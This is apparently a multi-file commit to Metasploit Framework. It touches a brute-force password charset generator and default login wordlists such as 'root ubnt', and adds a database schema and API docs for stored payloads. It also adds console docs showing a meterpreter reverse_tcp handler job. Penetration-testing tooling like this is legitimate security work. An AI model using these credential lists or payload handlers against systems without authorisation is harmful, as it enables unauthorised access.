+		charset[i++] = c++;
+	charset[i++] = 0x1ee4d;	// ARABIC MATHEMATICAL TAILED NOON
+	charset[i++] = 0x1ee4f;	// ARABIC MATHEMATICAL TAILED AIN
+	charset[i++] = 0x1ee51;	// ARABIC MATHEMATICAL TAILED SAD
+	charset[i++] = 0x1ee52;	// ARABIC MATHEMATICAL TAILED QAF
+	charset[i++] = 0x1ee61;	// ARABIC MATHEMATICAL STRETCHED BEH
+	charset[i++] = 0x1ee62;	// ARABIC MATHEMATICAL STRETCHED JEEM
+	c = 0x1ee67;		// from ARABIC MATHEMATICAL STRETCHED HAH
+	while (c <= 0x1ee6a)	// ..to ARABIC MATHEMATICAL STRETCHED KAF
+		charset[i++] = c++;
+	c = 0x1ee6c;		// from ARABIC MATHEMATICAL STRETCHED MEEM
+	while (c <= 0x1ee72)	// ..to ARABIC MATHEMATICAL STRETCHED QAF
+		charset[i++] = c++;
+	c = 0x1ee74;		// from ARABIC MATHEMATICAL STRETCHED SHEEN
+	while (c <= 0x1ee77)	// ..to ARABIC MATHEMATICAL STRETCHED KHAH
+		charset[i++] = c++;
+	c = 0x1ee79;		// from ARABIC MATHEMATICAL STRETCHED DAD
+	while (c <= 0x1ee7c)	// ..to ARABIC MATHEMATICAL STRETCHED DOTLESS BEH
+		charset[i++] = c++;
+	c = 0x1ee80;		// from ARABIC MATHEMATICAL LOOPED ALEF
+	while (c <= 0x1ee89)	// ..to ARABIC MATHEMATICAL LOOPED YEH
+		charset[i++] = c++;
+	c = 0x1ee8b;		// from ARABIC MATHEMATICAL LOOPED LAM
+	while (c <= 0x1ee9b)	// ..to ARABIC MATHEMATICAL LOOPED GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eea1;	// ARABIC MATHEMATICAL DOUBLE-STRUCK BEH
+	charset[i++] = 0x1eea3;	// ARABIC MATHEMATICAL DOUBLE-STRUCK DAL
+	c = 0x1eea5;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK WAW
+	while (c <= 0x1eea9)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK YEH
+		charset[i++] = c++;
+	c = 0x1eeab;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK LAM
+	while (c <= 0x1eebb)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eef0;	// ARABIC MATHEMATICAL OPERATOR MEEM WITH HAH WITH TATWEEL
+	charset[i++] = 0x1eef1;	// ARABIC MATHEMATICAL OPERATOR HAH WITH DAL
+// 1F000..1F02F; Mahjong Tiles
+	c = 0x1f000;		// from MAHJONG TILE EAST WIND
+	while (c <= 0x1f02b)	// ..to MAHJONG TILE BACK
+		charset[i++] = c++;
+// 1F030..1F09F; Domino Tiles
+	c = 0x1f030;		// from DOMINO TILE HORIZONTAL BACK
+	while (c <= 0x1f093)	// ..to DOMINO TILE VERTICAL-06-06
+		charset[i++] = c++;
+// 1F0A0..1F0FF; Playing Cards
+	c = 0x1f0a0;		// from PLAYING CARD BACK
+	while (c <= 0x1f0ae)	// ..to PLAYING CARD KING OF SPADES
+		charset[i++] = c++;
+	c = 0x1f0b1;		// from PLAYING CARD ACE OF HEARTS
+	while (c <= 0x1f0bf)	// ..to PLAYING CARD RED JOKER
+		charset[i++] = c++;
+	c = 0x1f0c1;		// from PLAYING CARD ACE OF DIAMONDS
+	while (c <= 0x1f0cf)	// ..to PLAYING CARD BLACK JOKER
+		charset[i++] = c++;
+	c = 0x1f0d1;		// from PLAYING CARD ACE OF CLUBS
+	while (c <= 0x1f0f5)	// ..to PLAYING CARD TRUMP-21
+		charset[i++] = c++;
+// 1F100..1F1FF; Enclosed Alphanumeric Supplement
+	c = 0x1f100;		// from DIGIT ZERO FULL STOP
+	while (c <= 0x1f10c)	// ..to DINGBAT NEGATIVE CIRCLED SANS-SERIF DIGIT ZERO
+		charset[i++] = c++;
+	c = 0x1f110;		// from PARENTHESIZED LATIN CAPITAL LETTER A
+	while (c <= 0x1f16b)	// ..to RAISED MD SIGN
+		charset[i++] = c++;
+	c = 0x1f170;		// from NEGATIVE SQUARED LATIN CAPITAL LETTER A
+	while (c <= 0x1f1ac)	// ..to SQUARED VOD
+		charset[i++] = c++;
+	c = 0x1f1e6;		// from REGIONAL INDICATOR SYMBOL LETTER A
+	while (c <= 0x1f1ff)	// ..to REGIONAL INDICATOR SYMBOL LETTER Z
+		charset[i++] = c++;
+// 1F200..1F2FF; Enclosed Ideographic Supplement
+	charset[i++] = 0x1f200;	// SQUARE HIRAGANA HOKA
+	charset[i++] = 0x1f202;	// SQUARED KATAKANA SA
+	c = 0x1f210;		// from SQUARED CJK UNIFIED IDEOGRAPH-624B
+	while (c <= 0x1f23b)	// ..to SQUARED CJK UNIFIED IDEOGRAPH-914D
+		charset[i++] = c++;
+	c = 0x1f240;		// from TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-672C
+	while (c <= 0x1f248)	// ..to TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-6557
+		charset[i++] = c++;
+	charset[i++] = 0x1f250;	// CIRCLED IDEOGRAPH ADVANTAGE
+	charset[i++] = 0x1f251;	// CIRCLED IDEOGRAPH ACCEPT
+	c = 0x1f260;		// from ROUNDED SYMBOL FOR FU
+	while (c <= 0x1f265)	// ..to ROUNDED SYMBOL FOR CAI
+		charset[i++] = c++;
+// 1F300..1F5FF; Miscellaneous Symbols and Pictographs
+	c = 0x1f300;		// from CYCLONE
+	while (c <= 0x1f5ff)	// ..to MOYAI
+		charset[i++] = c++;
+// 1F600..1F64F; Emoticons
+	c = 0x1f600;		// from GRINNING FACE
+	while (c <= 0x1f64f)	// ..to PERSON WITH FOLDED HANDS
+		charset[i++] = c++;
+// 1F650..1F67F; Ornamental Dingbats
+	c = 0x1f650;		// from NORTH WEST POINTING LEAF
+	while (c <= 0x1f67f)	// ..to REVERSE CHECKER BOARD
+		charset[i++] = c++;
+// 1F680..1F6FF; Transport and Map Symbols
+	c = 0x1f680;		// from ROCKET
+	while (c <= 0x1f6d4)	// ..to PAGODA
+		charset[i++] = c++;
+	c = 0x1f6e0;		// from HAMMER AND WRENCH
+	while (c <= 0x1f6ec)	// ..to AIRPLANE ARRIVING
+		charset[i++] = c++;
+	c = 0x1f6f0;		// from SATELLITE
+	while (c <= 0x1f6f9)	// ..to SKATEBOARD
+		charset[i++] = c++;
+// 1F700..1F77F; Alchemical Symbols
+	c = 0x1f700;		// from ALCHEMICAL SYMBOL FOR QUINTESSENCE
+	while (c <= 0x1f773)	// ..to ALCHEMICAL SYMBOL FOR HALF OUNCE
+		charset[i++] = c++;
+// 1F780..1F7FF; Geometric Shapes Extended
+	c = 0x1f780;		// from BLACK LEFT-POINTING ISOSCELES RIGHT TRIANGLE
+	while (c <= 0x1f7d8)	// ..to NEGATIVE CIRCLED SQUARE
+		charset[i++] = c++;
+// 1F800..1F8FF; Supplemental Arrows-C
+	c = 0x1f800;		// from LEFTWARDS ARROW WITH SMALL TRIANGLE ARROWHEAD
+	while (c <= 0x1f80b)	// ..to DOWNWARDS ARROW WITH LARGE TRIANGLE ARROWHEAD
+		charset[i++] = c++;
+	c = 0x1f810;		// from LEFTWARDS ARROW WITH SMALL EQUILATERAL ARROWHEAD
+	while (c <= 0x1f847)	// ..to DOWNWARDS HEAVY ARROW
+		charset[i++] = c++;
+	c = 0x1f850;		// from LEFTWARDS SANS-SERIF ARROW
+	while (c <= 0x1f859)	// ..to UP DOWN SANS-SERIF ARROW
+		charset[i++] = c++;
+	c = 0x1f860;		// from WIDE-HEADED LEFTWARDS LIGHT BARB ARROW
+	while (c <= 0x1f887)	// ..to WIDE-HEADED SOUTH WEST VERY HEAVY BARB ARROW
+		charset[i++] = c++;
+	c = 0x1f890;		// from LEFTWARDS TRIANGLE ARROWHEAD
+	while (c <= 0x1f8ad)	// ..to WHITE ARROW SHAFT WIDTH TWO THIRDS
+		charset[i++] = c++;
+// 1F900..1F9FF; Supplemental Symbols and Pictographs
+	c = 0x1f900;		// from CIRCLED CROSS FORMEE WITH FOUR DOTS
+	while (c <= 0x1f90b)	// ..to DOWNWARD FACING NOTCHED HOOK WITH DOT
+		charset[i++] = c++;
+	c = 0x1f910;		// from ZIPPER-MOUTH FACE
+	while (c <= 0x1f93e)	// ..to HANDBALL
+		charset[i++] = c++;
+	c = 0x1f940;		// from WILTED FLOWER
+	while (c <= 0x1f970)	// ..to SMILING FACE WITH SMILING EYES AND THREE HEARTS
+		charset[i++] = c++;
+	c = 0x1f973;		// from FACE WITH PARTY HORN AND PARTY HAT
+	while (c <= 0x1f976)	// ..to FREEZING FACE
+		charset[i++] = c++;
+	c = 0x1f97c;		// from LAB COAT
+	while (c <= 0x1f9a2)	// ..to SWAN
+		charset[i++] = c++;
+	c = 0x1f9b0;		// from EMOJI COMPONENT RED HAIR
+	while (c <= 0x1f9b9)	// ..to SUPERVILLAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1f9c0;	// CHEESE WEDGE
+	charset[i++] = 0x1f9c2;	// SALT SHAKER
+	c = 0x1f9d0;		// from FACE WITH MONOCLE
+	while (c <= 0x1f9ff)	// ..to NAZAR AMULET
+		charset[i++] = c++;
+// 1FA00..1FA6F; Chess Symbols
+	c = 0x1fa60;		// from XIANGQI RED GENERAL
+	while (c <= 0x1fa6d)	// ..to XIANGQI BLACK SOLDIER
+		charset[i++] = c++;
+// 20000..2A6DF; CJK Unified Ideographs Extension B
+	c = 0x20000;		// from <CJK Ideograph Extension B, First>
+	while (c <= 0x2a6d6)	// ..to <CJK Ideograph Extension B, Last>
+		charset[i++] = c++;
+// 2A700..2B73F; CJK Unified Ideographs Extension C
+	c = 0x2a700;		// from <CJK Ideograph Extension C, First>
+	while (c <= 0x2b734)	// ..to <CJK Ideograph Extension C, Last>
+		charset[i++] = c++;
+// 2B740..2B81F; CJK Unified Ideographs Extension D
+	c = 0x2b740;		// from <CJK Ideograph Extension D, First>
+	while (c <= 0x2b81d)	// ..to <CJK Ideograph Extension D, Last>
+		charset[i++] = c++;
+// 2B820..2CEAF; CJK Unified Ideographs Extension E
+	c = 0x2b820;		// from <CJK Ideograph Extension E, First>
+	while (c <= 0x2cea1)	// ..to <CJK Ideograph Extension E, Last>
+		charset[i++] = c++;
+// 2CEB0..2EBEF; CJK Unified Ideographs Extension F
+	c = 0x2ceb0;		// from <CJK Ideograph Extension F, First>
+	while (c <= 0x2ebe0)	// ..to <CJK Ideograph Extension F, Last>
+		charset[i++] = c++;
+// 2F800..2FA1F; CJK Compatibility Ideographs Supplement
+	c = 0x2f800;		// from CJK COMPATIBILITY IDEOGRAPH-2F800
+	while (c <= 0x2fa1d)	// ..to CJK COMPATIBILITY IDEOGRAPH-2FA1D
+		charset[i++] = c++;
+// E0000..E007F; Tags
+	c = 0xe0020;		// from TAG SPACE
+	while (c <= 0xe007f)	// ..to CANCEL TAG
+		charset[i++] = c++;
+// E0100..E01EF; Variation Selectors Supplement
+// F0000..FFFFF; Supplementary Private Use Area-A
+// 100000..10FFFF; Supplementary Private Use Area-B
+
+/* Zero-terminate it, and cache the first character */
+	charset[maxc = i] = 0;
+
+	length = minlength; c = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i, cl, wl;
+
+	if (target_utf8) {
+		cl = 1;
+		if (charset[c] >= 0x80) {
+			cl++;
+			if (charset[c] >= 0x0800)
+				cl++;
+			if (charset[c] >= 0x10000)
+				cl++;
+			wl = length * cl;
+			if (wl > cipher_limit) {
+				c = 0;
+				if (++length > maxlength) {
+					word = 0;
+					return;
+				}
+				cl = 1;
+				if (charset[0] >= 0x80) {
+					cl++;
+					if (charset[0] >= 0x0800)
+						cl++;
+					if (charset[0] >= 0x10000)
+						cl++;
+					wl = length * cl;
+					if (wl > cipher_limit) {
+						word = 0;
+						return;
+					}
+				}
+			}
+		}
+	}
+
+	i = 0;
+	while (i < length)
+		word[i++] = charset[c];
+	word[i] = 0;
+
+	if (++c < maxc)
+		return;
+
+	c = 0;
+	if (++length > maxlength)
+		length = 0; // Will NUL out the next "word" and thus terminate
+
+	return;
+}
+
+/* Reset length & c */
+void restore()
+{
+	length = 0;
+
+	while (word[length]) {
+		length++;
+	}
+	c = word[0];
+}
@@ -0,0 +1,4 @@
+244+0000009999
+188+030000
+19b+00000F
+19b+000010
@@ -4,3 +4,4 @@ root
 Administrator
 USERID
 guest
+Admin
@@ -405,6 +405,7 @@ root realtek
 root root
 root tini
 root tslinux
+root ubnt
 root user
 root vizxv
 root wyse
@@ -44,7 +44,7 @@ apc
 bintec
 blue
 c
-cable-d
+cable-docsis
 canon_admin
 cc
 cisco
@@ -11,7 +11,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema.define(version: 20161227212223) do
+ActiveRecord::Schema.define(version: 20190507120211) do

  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"
@@ -22,6 +22,17 @@ ActiveRecord::Schema.define(version: 20161227212223) do
    t.datetime "updated_at", null: false
  end

+  create_table "async_callbacks", force: :cascade do |t|
+    t.string   "uuid",           null: false
+    t.integer  "timestamp",      null: false
+    t.string   "listener_uri"
+    t.string   "target_host"
+    t.string   "target_port"
+    t.datetime "created_at",     null: false
+    t.datetime "updated_at",     null: false
+    t.uuid     "{:null=>false}"
+  end
+
  create_table "automatic_exploitation_match_results", force: :cascade do |t|
    t.integer  "match_id"
    t.integer  "run_id"
@@ -475,6 +486,23 @@ ActiveRecord::Schema.define(version: 20161227212223) do
  add_index "notes", ["ntype"], name: "index_notes_on_ntype", using: :btree
  add_index "notes", ["vuln_id"], name: "index_notes_on_vuln_id", using: :btree

+  create_table "payloads", force: :cascade do |t|
+    t.string   "name"
+    t.string   "uuid"
+    t.integer  "uuid_mask"
+    t.integer  "timestamp"
+    t.string   "arch"
+    t.string   "platform"
+    t.string   "urls"
+    t.string   "description"
+    t.string   "raw_payload"
+    t.string   "raw_payload_hash"
+    t.string   "build_status"
+    t.string   "build_opts"
+    t.datetime "created_at",       null: false
+    t.datetime "updated_at",       null: false
+  end
+
  create_table "profiles", force: :cascade do |t|
    t.datetime "created_at",                null: false
    t.datetime "updated_at",                null: false
@@ -15,8 +15,6 @@ module ModuleSearchApiDoc
  DISCLOSURE_DATE_DESC = 'Filter modules with a matching disclosure date.'
  DATE_DESC = 'Alias for \'disclosure_date\'.'
  FULL_NAME_DESC = 'Filter modules with a matching full name.'
-  IS_CLIENT_DESC = 'Filter modules that are client attacks. (Accepts strings \'true\' or \'false\').'
-  IS_SERVER_DESC = 'Filter modules that are server attacks. (Accepts strings \'true\' or \'false\').'
  IS_INSTALL_PATH_DESC = 'Filter modules that by value of \'is_install_path\'. (Accepts strings \'true\' or \'false\').'
  MOD_TIME_DESC = 'Filter modules with a matching modification time.'
  NAME_DESC = 'Filter modules with a matching descriptive name.'
@@ -34,7 +32,7 @@ module ModuleSearchApiDoc
  TARGETS_DESC = 'Alias for \'target\'.'
  TEXT_DESC = 'Filter modules matching any one of name, full name, description, reference, author, or targets.'
  TYPE_DESC = 'Filter modules with a matching type (exploit, auxiliary, payload, etc.).'
-  FIELDS_DESC = 'Provide a comma-delimited list of metadata fields you would like to return. If left blank, all fields will be returned. Valid field names are: \'name\', \'full_name\', \'fullname\', \'aka\', \'arch\', \'author\', \'author\', \'description\', \'disclosure_date\', \'cve\', \'edb\', \'bid\', \'mod_time\', \'is_client\', \'is_server\', \'is_install_path\', \'os\', \'platform\', \'reference\', \'references\', \'ref_name\', \'ref\', \'path\', \'port\', \'rport\', \'rank\', \'type\', \'target\', \'targets\''
+  FIELDS_DESC = 'Provide a comma-delimited list of metadata fields you would like to return. If left blank, all fields will be returned. Valid field names are: \'name\', \'full_name\', \'fullname\', \'aka\', \'arch\', \'author\', \'author\', \'description\', \'disclosure_date\', \'cve\', \'edb\', \'bid\', \'mod_time\', \'is_install_path\', \'os\', \'platform\', \'reference\', \'references\', \'ref_name\', \'ref\', \'path\', \'port\', \'rport\', \'rank\', \'type\', \'target\', \'targets\''
  NOTES_DESC = 'Extra info for a module, such as AKA names or NOCVE explanations.'

  TYPE_ENUM = [
@@ -97,8 +95,6 @@ module ModuleSearchApiDoc
    property :description, type: :string, description: DESCRIPTION_DESC, example: DESCRIPTION_EXAMPLE
    property :author, description: AUTHOR_DESC, example: AUTHOR_EXAMPLE, type: :array do items type: :string end
    property :references, description: REFERENCE_DESC, example: REFERENCES_EXAMPLE, type: :array do items type: :string end
-    property :is_client, type: :boolean, description: IS_CLIENT_DESC, example: IS_CLIENT_EXAMPLE
-    property :is_server, type: :boolean, description: IS_SERVER_DESC, example: IS_SERVER_EXAMPLE
    property :platform, type: :string, description: PLATFORM_DESC, example: PLATFORM_EXAMPLE
    property :arch, type: :string, description: ARCH_DESC, example: ARCH_EXAMPLE
    property :rport, type: :string, description: PORT_DESC, example: RPORT_EXAMPLE
@@ -130,8 +126,6 @@ module ModuleSearchApiDoc
        :disclosure_date => DISCLOSURE_DATE_DESC,
        :date => DATE_DESC,
        :full_name => FULL_NAME_DESC,
-        :is_client => IS_CLIENT_DESC,
-        :is_server => IS_SERVER_DESC,
        :is_install_path => IS_INSTALL_PATH_DESC,
        :mod_time => MOD_TIME_DESC,
        :name => NAME_DESC,
@@ -0,0 +1,242 @@
+require 'swagger/blocks'
+
+module PayloadApiDoc
+  include Swagger::Blocks
+
+  NAME_DESC = 'A name for the payload.'
+  UUID_DESC = 'A payload\'s unique identifier.'
+  UUID_EXAMPLE = '6dde5ce0e94c9f43'
+  TIMESTAMP_DESC = 'The Unix format timestamp when this payload was created.'
+  TIMESTAMP_EXAMPLE = '1536777407'
+  ARCH_DESC = 'The architecture this payload supports.'
+  ARCH_EXAMPLE = 'x86'
+  PLATFORM_DESC = 'The platform this payload supports.'
+  PLATFORM_EXAMPLE = 'windows'
+  URLS_DESC = 'The unique, encoded urls used to host this payload. Only applicable for http(s) payloads.'
+  URLS_EXAMPLE = ['/bd5c4OlMn0OeQp9AxdvC_Q2EIcdSRvg7gzLdQwU__Mb1WtjGR8C4UbjohhRIgbmBfFFBsNJ-wZMyFZKK33aorc8qfD0xCsmxSEyHaiyjGn0ykbJOlYFF1j1HXShiKiiwbfh_wPf2uqSWk2tnaLAqwuvxPcRuDPF-kdkmDDC2']
+  DESCRIPTION_DESC = 'A description of why this payload was created and what it is being used for.'
+  WORKSPACE_ID_DESC = 'The ID of the workspace this payload belongs to.'
+  WORKSPACE_ID_EXAMPLE = 1
+  RAW_PAYLOAD_DESC = 'A URL pointing to where the binary payload can be downloaded from.'
+  RAW_PAYLOAD_HASH_DESC = 'The unique hash value for the generated payload binary.'
+  BUILD_OPTS_DESC = 'A hash containing various options used to build this payload.'
+
+# Swagger documentation for payloads model
+  swagger_schema :Payload do
+    key :required, [:ntype]
+    property :workspace, type: :string, required: true, description: RootApiDoc::WORKSPACE_POST_EXAMPLE
+    property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
+    property :name, type: :string, description: NAME_DESC
+    property :uuid, type: :string, description: UUID_DESC, example: UUID_EXAMPLE
+    property :timestamp, type: :integer, description: TIMESTAMP_DESC, example: TIMESTAMP_EXAMPLE
+    property :arch, type: :string, description: ARCH_DESC, example: ARCH_EXAMPLE
+    property :platform, type: :string, description: PLATFORM_DESC, example: PLATFORM_EXAMPLE
+    property :urls, description: URLS_DESC, example: URLS_EXAMPLE, type: :array do items type: :string end
+    property :description, type: :string, description: DESCRIPTION_DESC
+    property :raw_payload, type: :string, description: RAW_PAYLOAD_DESC
+    property :raw_payload_hash, type: :string, description: RAW_PAYLOAD_HASH_DESC
+    property :build_opts, type: :string, description: BUILD_OPTS_DESC
+    property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
+    property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
+  end
+
+  swagger_path '/api/v1/payloads' do
+    # Swagger documentation for /api/v1/payloads GET
+    operation :get do
+      key :description, 'Return payloads that are stored in the database.'
+      key :tags, [ 'payload' ]
+
+      parameter :workspace
+
+      response 200 do
+        key :description, 'Returns payload data.'
+        schema do
+          property :data do
+            key :type, :array
+            items do
+              key :'$ref', :Payload
+            end
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+
+    # Swagger documentation for /api/v1/payloads POST
+    operation :post do
+      key :description, 'Create a payload entry.'
+      key :tags, [ 'payload' ]
+
+      parameter do
+        key :in, :body
+        key :name, :body
+        key :description, 'The attributes to assign to the payload.'
+        key :required, true
+        schema do
+          property :name, type: :string, description: NAME_DESC
+          property :uuid, type: :string, description: UUID_DESC, example: UUID_EXAMPLE
+          property :timestamp, type: :string, description: TIMESTAMP_DESC, example: TIMESTAMP_EXAMPLE
+          property :arch, type: :string, description: ARCH_DESC, example: ARCH_EXAMPLE
+          property :platform, type: :string, description: PLATFORM_DESC, example: PLATFORM_EXAMPLE
+          property :urls, type: :string, description: URLS_DESC, example: URLS_EXAMPLE
+          property :description, type: :string, description: DESCRIPTION_DESC
+          property :raw_payload, type: :string, description: RAW_PAYLOAD_DESC
+          property :raw_payload_hash, type: :string, description: RAW_PAYLOAD_HASH_DESC
+          property :build_opts, type: :string, description: BUILD_OPTS_DESC
+          property :workspace_id, type: :string, description: WORKSPACE_ID_DESC, example: WORKSPACE_ID_EXAMPLE
+        end
+      end
+
+      response 200 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_200
+        schema do
+          property :data do
+            key :'$ref', :Payload
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+
+    # Swagger documentation for /api/v1/payloads/ DELETE
+    operation :delete do
+      key :description, 'Delete the specified payloads.'
+      key :tags, [ 'payload' ]
+
+      parameter :delete_opts
+
+      response 200 do
+        key :description, 'Returns an array containing the successfully deleted payloads.'
+        schema do
+          property :data do
+            key :type, :array
+            items do
+              key :'$ref', :Payload
+            end
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+  end
+
+  swagger_path '/api/v1/payloads/{id}' do
+    # Swagger documentation for api/v1/payloads/:id GET
+    operation :get do
+      key :description, 'Return specific payload that is stored in the database.'
+      key :tags, [ 'payload' ]
+
+      parameter do
+        key :name, :id
+        key :in, :path
+        key :description, 'ID of payload to retrieve.'
+        key :required, true
+        key :type, :integer
+        key :format, :int32
+      end
+
+      response 200 do
+        key :description, 'Returns payload data.'
+        schema do
+          property :data do
+            key :'$ref', :Payload
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+
+    # Swagger documentation for /api/v1/payloads/:id PUT
+    operation :put do
+      key :description, 'Update the attributes an existing payload.'
+      key :tags, [ 'payload' ]
+
+      parameter :update_id
+
+      parameter do
+        key :in, :body
+        key :name, :body
+        key :description, 'The updated attributes to overwrite to the payload.'
+        key :required, true
+        schema do
+          key :'$ref', :Payload
+        end
+      end
+
+      response 200 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_200
+        schema do
+          property :data do
+            key :'$ref', :Payload
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+  end
+end
@@ -72,6 +72,7 @@ module RootApiDoc
    tag name: 'msf', description: 'Utility operations around Metasploit Framework.'
    tag name: 'nmap', description: 'Nmap operations.'
    tag name: 'note', description: 'Note operations.'
+    tag name: 'payload', description: 'Payload operations.'
    tag name: 'service', description: 'Service operations.'
    tag name: 'session', description: 'Session operations.'
    tag name: 'session_event', description: 'Session Event operations.'
@@ -0,0 +1,53 @@
+msfconsole
+==========
+
+`msfconsole` is the primary interface to Metasploit Framework. There is quite a
+lot that needs go here, please be patient and keep an eye on this space!
+
+Building ranges and lists
+-------------------------
+
+Many commands and options that take a list of things can use ranges to avoid
+having to manually list each desired thing. All ranges are inclusive.
+
+### Ranges of IDs
+
+Commands that take a list of IDs can use ranges to help. Individual IDs must be
+separated by a `,` (no space allowed) and ranges can be expressed with either
+`-` or `..`.
+
+### Ranges of IPs
+
+There are several ways to specify ranges of IP addresses that can be mixed
+together. The first way is a list of IPs separated by just a ` ` (ASCII space),
+with an optional `,`. The next way is two complete IP addresses in the form of
+`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
+specifications may also be used, however the whole address must be given to
+Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
+Additionally, a netmask can be used in conjunction with a domain name to
+dynamically resolve which block to target. All these methods work for both IPv4
+and IPv6 addresses. IPv4 addresses can also be specified with special octet
+ranges from the [NMAP target
+specification](https://nmap.org/book/man-target-specification.html)
+
+### Examples
+
+Terminate the first sessions:
+
+    sessions -k 1
+
+Stop some extra running jobs:
+
+    jobs -k 2-6,7,8,11..15
+
+Check a set of IP addresses:
+
+    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255
+
+Target a set of IPv6 hosts:
+
+    set RHOSTS fe80::3990:0000/110, ::1-::f0f0
+
+Target a block from a resolved domain name:
+
+    set RHOSTS www.example.test/24
@@ -0,0 +1,124 @@
+Jobs
+====
+
+The `jobs` command is used to interact with modules running in the
+background. Using jobs allows you to run multiple modules at once, like
+multiple `exploit/multi/hander` runs with different options to listen
+for different payloads to call back. Framework automatically starts
+modules that wait for something to happen ("passive modules") as jobs,
+and `run -j` will start any module as a job. When a module is started
+as a job, you will see a message like `[*] Exploit running as
+background job X.`. You will then be able to continue interacting with
+Metasploit as normal, and output from the module will continue to be
+printed to the console, like a background job in other shells.
+
+Usage
+-----
+
+### Flags
+
+#### -h
+
+Display the help banner.
+
+#### -i JOB_ID
+
+Show details of the specified `JOB_ID`, including the name and the time
+the job was started.
+
+#### -K
+
+Stop all currently running jobs.
+
+#### -k JOB_IDS
+
+Stop the specified list of jobs. See [msfconsole > Building ranges and
+lists](../msfconsole.md#building-ranges-and-lists) for more details on
+how to build ranges.
+
+#### -l
+
+List all the currently running jobs. This is the default action. Module
+name, payload, and some payload configuration is shown when present.
+
+#### -P
+
+Save each of the currently running jobs to be restarted when
+`msfconsole` is started. Only valid for jobs running payload handlers.
+See [Persistence](#persistence) below.
+
+#### -p JOB_IDS
+
+Save the specified list of jobs to restarted when `msfconsole` is
+started. Only valid for jobs running payload handlers. See
+[Persistence](#persistence) below and [msfconsole > Building ranges and
+lists](../msfconsole.md#building-ranges-and-listss) for how to specify
+a list of `JOB_IDS`.
+
+#### -S FILTER
+
+Apply a search filter for the output. Currently ignored.
+
+#### -v
+
+Show verbose information with `-i` and `-l`. When combined with `-i`,
+display the advanced options given to the module run. When combined
+with `-l` or no other flags, displays an expanded table of jobs, adding
+the URI for HTTP payload handlers, start time, handler options (if
+present), and whether the job has been persisted with `-p` or `-P`.
+
+Persistence
+-----------
+
+The `-P` and `-p JOB_IDS` flags save payload handler jobs to be started
+every time `msfconsole` is started. This works by saving the
+information needed to start an equivalent `exploit/multi/handler` run
+as a JSON blob in the job persistence file, `~/.msf4/persist` by
+default.
+
+Examples
+--------
+
+Starting a module as a job:
+
+    msf5 exploit(multi/handler) > run -j
+    [*] Exploit running as background job 1.
+
+A verbose listing of all the jobs:
+
+    msf5 exploit(multi/handler) > jobs -v
+    
+    Jobs
+    ====
+    
+      Id  Name                    Payload                          Payload opts          URIPATH  Start Time                 Handler opts  Persist
+      --  ----                    -------                          ------------          -------  ----------                 ------------  -------
+      1   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://127.0.0.1:4444           2019-02-20 19:02:58 -0600                true
+
+Set some jobs to be started on `msfconsole` start:
+
+    msf5 exploit(multi/handler) > jobs -p 1-2
+    Added persistence to job 1.
+    Added persistence to job 2.
+
+Getting information about a specific job:
+
+    msf5 exploit(multi/handler) > jobs -i 1
+    
+    Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
+    msf5 exploit(multi/handler) > jobs -i 1 -v
+    
+    Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
+    
+    Module advanced options:
+    
+       Name                    Current Setting  Required  Description
+       ----                    ---------------  --------  -----------
+       ContextInformationFile                   no        The information file that contains context information
+       DisablePayloadHandler   false            no        Disable the handler code for the selected payload
+       EnableContextEncoding   false            no        Use transient context when encoding payloads
+       ExitOnSession           true             yes       Return from the exploit after a session has been created
+       ListenerTimeout         0                no        The maximum number of seconds to wait for new sessions
+       VERBOSE                 false            no        Enable detailed status messages
+       WORKSPACE                                no        Specify the workspace for this module
+       WfsDelay                0                no        Additional delay when waiting for a session
@@ -0,0 +1,37 @@
+Repeat
+======
